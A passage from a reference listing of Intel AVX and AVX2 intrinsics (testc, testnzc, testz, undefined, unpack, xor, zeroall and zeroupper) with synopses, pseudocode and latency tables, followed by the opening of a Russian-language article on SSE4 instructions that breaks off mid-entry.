Compute the bitwise AND of 128 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return the CF value.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[63] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[63] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestpd
int _mm256_testc_pd (__m256d a, __m256d b)

Synopsis

int _mm256_testc_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vtestpd ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return the CF value.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vtestps
int _mm_testc_ps (__m128 a, __m128 b)

Synopsis

int _mm_testc_ps (__m128 a, __m128 b)
#include «immintrin.h»
Instruction: vtestps xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return the CF value.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestps
int _mm256_testc_ps (__m256 a, __m256 b)

Synopsis

int _mm256_testc_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vtestps ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return the CF value.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vptest
int _mm256_testc_si256 (__m256i a, __m256i b)

Synopsis

int _mm256_testc_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vptest ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing integer data) in a and b, and set ZF to 1 if the result is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, and set CF to 1 if the result is zero, otherwise set CF to 0. Return the CF value.

Operation

IF (a[255:0] AND b[255:0] == 0) ZF := 1 ELSE ZF := 0 FI IF ((NOT a[255:0]) AND b[255:0] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 2
Sandy Bridge 2
vtestpd
int _mm_testnzc_pd (__m128d a, __m128d b)

Synopsis

int _mm_testnzc_pd (__m128d a, __m128d b)
#include «immintrin.h»
Instruction: vtestpd xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[63] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[63] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestpd
int _mm256_testnzc_pd (__m256d a, __m256d b)

Synopsis

int _mm256_testnzc_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vtestpd ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vtestps
int _mm_testnzc_ps (__m128 a, __m128 b)

Synopsis

int _mm_testnzc_ps (__m128 a, __m128 b)
#include «immintrin.h»
Instruction: vtestps xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestps
int _mm256_testnzc_ps (__m256 a, __m256 b)

Synopsis

int _mm256_testnzc_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vtestps ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vptest
int _mm256_testnzc_si256 (__m256i a, __m256i b)

Synopsis

int _mm256_testnzc_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vptest ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing integer data) in a and b, and set ZF to 1 if the result is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, and set CF to 1 if the result is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

IF (a[255:0] AND b[255:0] == 0) ZF := 1 ELSE ZF := 0 FI IF ((NOT a[255:0]) AND b[255:0] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 2
Sandy Bridge 2
vtestpd
int _mm_testz_pd (__m128d a, __m128d b)

Synopsis

int _mm_testz_pd (__m128d a, __m128d b)
#include «immintrin.h»
Instruction: vtestpd xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return the ZF value.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[63] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[63] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestpd
int _mm256_testz_pd (__m256d a, __m256d b)

Synopsis

int _mm256_testz_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vtestpd ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return the ZF value.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vtestps
int _mm_testz_ps (__m128 a, __m128 b)

Synopsis

int _mm_testz_ps (__m128 a, __m128 b)
#include «immintrin.h»
Instruction: vtestps xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return the ZF value.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestps
int _mm256_testz_ps (__m256 a, __m256 b)

Synopsis

int _mm256_testz_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vtestps ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return the ZF value.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vptest
int _mm256_testz_si256 (__m256i a, __m256i b)

Synopsis

int _mm256_testz_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vptest ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing integer data) in a and b, and set ZF to 1 if the result is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, and set CF to 1 if the result is zero, otherwise set CF to 0. Return the ZF value.

Operation

IF (a[255:0] AND b[255:0] == 0) ZF := 1 ELSE ZF := 0 FI IF ((NOT a[255:0]) AND b[255:0] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 2
Sandy Bridge 2
__m256d _mm256_undefined_pd (void)

Synopsis

__m256d _mm256_undefined_pd (void)
#include «immintrin.h»
CPUID Flags: AVX

Description

Return vector of type __m256d with undefined elements.
__m256 _mm256_undefined_ps (void)

Synopsis

__m256 _mm256_undefined_ps (void)
#include «immintrin.h»
CPUID Flags: AVX

Description

Return vector of type __m256 with undefined elements.
__m256i _mm256_undefined_si256 (void)

Synopsis

__m256i _mm256_undefined_si256 (void)
#include «immintrin.h»
CPUID Flags: AVX

Description

Return vector of type __m256i with undefined elements.
vpunpckhwd
__m256i _mm256_unpackhi_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpackhi_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckhwd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 16-bit integers from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_WORDS(src1[127:0], src2[127:0]){ dst[15:0] := src1[79:64] dst[31:16] := src2[79:64] dst[47:32] := src1[95:80] dst[63:48] := src2[95:80] dst[79:64] := src1[111:96] dst[95:80] := src2[111:96] dst[111:96] := src1[127:112] dst[127:112] := src2[127:112] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_WORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_WORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpckhdq
__m256i _mm256_unpackhi_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpackhi_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckhdq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 32-bit integers from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_DWORDS(src1[127:0], src2[127:0]){ dst[31:0] := src1[95:64] dst[63:32] := src2[95:64] dst[95:64] := src1[127:96] dst[127:96] := src2[127:96] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_DWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_DWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpckhqdq
__m256i _mm256_unpackhi_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpackhi_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckhqdq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 64-bit integers from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_QWORDS(src1[127:0], src2[127:0]){ dst[63:0] := src1[127:64] dst[127:64] := src2[127:64] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_QWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_QWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpckhbw
__m256i _mm256_unpackhi_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpackhi_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckhbw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 8-bit integers from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_BYTES(src1[127:0], src2[127:0]){ dst[7:0] := src1[71:64] dst[15:8] := src2[71:64] dst[23:16] := src1[79:72] dst[31:24] := src2[79:72] dst[39:32] := src1[87:80] dst[47:40] := src2[87:80] dst[55:48] := src1[95:88] dst[63:56] := src2[95:88] dst[71:64] := src1[103:96] dst[79:72] := src2[103:96] dst[87:80] := src1[111:104] dst[95:88] := src2[111:104] dst[103:96] := src1[119:112] dst[111:104] := src2[119:112] dst[119:112] := src1[127:120] dst[127:120] := src2[127:120] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_BYTES(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_BYTES(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vunpckhpd
__m256d _mm256_unpackhi_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_unpackhi_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vunpckhpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Unpack and interleave double-precision (64-bit) floating-point elements from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_QWORDS(src1[127:0], src2[127:0]){ dst[63:0] := src1[127:64] dst[127:64] := src2[127:64] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_QWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_QWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vunpckhps
__m256 _mm256_unpackhi_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_unpackhi_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vunpckhps ymm, ymm, ymm
CPUID Flags: AVX

Description

Unpack and interleave single-precision (32-bit) floating-point elements from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_DWORDS(src1[127:0], src2[127:0]){ dst[31:0] := src1[95:64] dst[63:32] := src2[95:64] dst[95:64] := src1[127:96] dst[127:96] := src2[127:96] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_DWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_DWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpunpcklwd
__m256i _mm256_unpacklo_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpacklo_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpcklwd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 16-bit integers from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_WORDS(src1[127:0], src2[127:0]){ dst[15:0] := src1[15:0] dst[31:16] := src2[15:0] dst[47:32] := src1[31:16] dst[63:48] := src2[31:16] dst[79:64] := src1[47:32] dst[95:80] := src2[47:32] dst[111:96] := src1[63:48] dst[127:112] := src2[63:48] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_WORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_WORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpckldq
__m256i _mm256_unpacklo_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpacklo_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckldq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 32-bit integers from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_DWORDS(src1[127:0], src2[127:0]){ dst[31:0] := src1[31:0] dst[63:32] := src2[31:0] dst[95:64] := src1[63:32] dst[127:96] := src2[63:32] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_DWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_DWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpcklqdq
__m256i _mm256_unpacklo_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpacklo_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpcklqdq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 64-bit integers from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_QWORDS(src1[127:0], src2[127:0]){ dst[63:0] := src1[63:0] dst[127:64] := src2[63:0] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_QWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_QWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpcklbw
__m256i _mm256_unpacklo_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpacklo_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpcklbw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 8-bit integers from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_BYTES(src1[127:0], src2[127:0]){ dst[7:0] := src1[7:0] dst[15:8] := src2[7:0] dst[23:16] := src1[15:8] dst[31:24] := src2[15:8] dst[39:32] := src1[23:16] dst[47:40] := src2[23:16] dst[55:48] := src1[31:24] dst[63:56] := src2[31:24] dst[71:64] := src1[39:32] dst[79:72] := src2[39:32] dst[87:80] := src1[47:40] dst[95:88] := src2[47:40] dst[103:96] := src1[55:48] dst[111:104] := src2[55:48] dst[119:112] := src1[63:56] dst[127:120] := src2[63:56] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_BYTES(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_BYTES(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vunpcklpd
__m256d _mm256_unpacklo_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_unpacklo_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vunpcklpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Unpack and interleave double-precision (64-bit) floating-point elements from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_QWORDS(src1[127:0], src2[127:0]){ dst[63:0] := src1[63:0] dst[127:64] := src2[63:0] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_QWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_QWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vunpcklps
__m256 _mm256_unpacklo_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_unpacklo_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vunpcklps ymm, ymm, ymm
CPUID Flags: AVX

Description

Unpack and interleave single-precision (32-bit) floating-point elements from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_DWORDS(src1[127:0], src2[127:0]){ dst[31:0] := src1[31:0] dst[63:32] := src2[31:0] dst[95:64] := src1[63:32] dst[127:96] := src2[63:32] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_DWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_DWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vxorpd
__m256d _mm256_xor_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_xor_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vxorpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise XOR of packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] XOR b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vxorps
__m256 _mm256_xor_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_xor_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vxorps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise XOR of packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] XOR b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpxor
__m256i _mm256_xor_si256 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_xor_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpxor ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the bitwise XOR of 256 bits (representing integer data) in a and b, and store the result in dst.

Operation

dst[255:0] := (a[255:0] XOR b[255:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vzeroall
void _mm256_zeroall (void)

Synopsis

void _mm256_zeroall (void)
#include «immintrin.h»
Instruction: vzeroall
CPUID Flags: AVX

Description

Zero the contents of all XMM or YMM registers.

Operation

YMM0[MAX:0] := 0 YMM1[MAX:0] := 0 YMM2[MAX:0] := 0 YMM3[MAX:0] := 0 YMM4[MAX:0] := 0 YMM5[MAX:0] := 0 YMM6[MAX:0] := 0 YMM7[MAX:0] := 0 IF 64-bit mode YMM8[MAX:0] := 0 YMM9[MAX:0] := 0 YMM10[MAX:0] := 0 YMM11[MAX:0] := 0 YMM12[MAX:0] := 0 YMM13[MAX:0] := 0 YMM14[MAX:0] := 0 YMM15[MAX:0] := 0 FI
vzeroupper
void _mm256_zeroupper (void)

Synopsis

void _mm256_zeroupper (void)
#include «immintrin.h»
Instruction: vzeroupper
CPUID Flags: AVX

Description

Zero the upper 128 bits of all YMM registers; the lower 128-bits of the registers are unmodified.

Operation

YMM0[MAX:128] := 0 YMM1[MAX:128] := 0 YMM2[MAX:128] := 0 YMM3[MAX:128] := 0 YMM4[MAX:128] := 0 YMM5[MAX:128] := 0 YMM6[MAX:128] := 0 YMM7[MAX:128] := 0 IF 64-bit mode YMM8[MAX:128] := 0 YMM9[MAX:128] := 0 YMM10[MAX:128] := 0 YMM11[MAX:128] := 0 YMM12[MAX:128] := 0 YMM13[MAX:128] := 0 YMM14[MAX:128] := 0 YMM15[MAX:128] := 0 FI

Performance

Architecture Latency Throughput
Haswell 0 1
Ivy Bridge 0 1
Sandy Bridge 0 1

SSE4 — CPU instruction set used in the Intel Core microarchitecture and AMD

SSE4 — набор команд микроархитектуры Intel Core

SSE4 состоит из 54 инструкций, 47 из них относят к SSE4.1 (они есть в процессорах Penryn). Полный набор команд (SSE4.1 и SSE4.2, то есть 47 + оставшиеся 7 команд) доступен в процессорах Intel с микроархитектурой Nehalem, которые были выпущены в середине ноября 2008 года и более поздних редакциях. Ни одна из SSE4 инструкций не работает с 64-х битными mmx регистрами (только со 128-ми битными xmm0-15).

Компилятор языка Си от Intel начиная с версии 10 генерирует инструкции SSE4 при задании опции -QxS. Компилятор Sun Studio от Sun Microsystems с версии 12 update 1 генерирует инструкции SSE4 с помощью опций -xarch=sse4_1 (SSE4.1) и -xarch=sse4_2 (SSE4.2). Компилятор GCC поддерживает SSE4.1 и SSE4.2 с версии 4.3, опции -msse4.1 и -msse4.2, или -msse4, включающая оба варианта.

Инструкции SSE4.1
Ускорение видео

  • MPSADBW xmm1, xmm2/m128, imm8 — (Multiple Packed Sums of Absolute Difference)
    • Input — { A0, A1,… A14 }, { B0, B1,… B15 }, Shiftmode
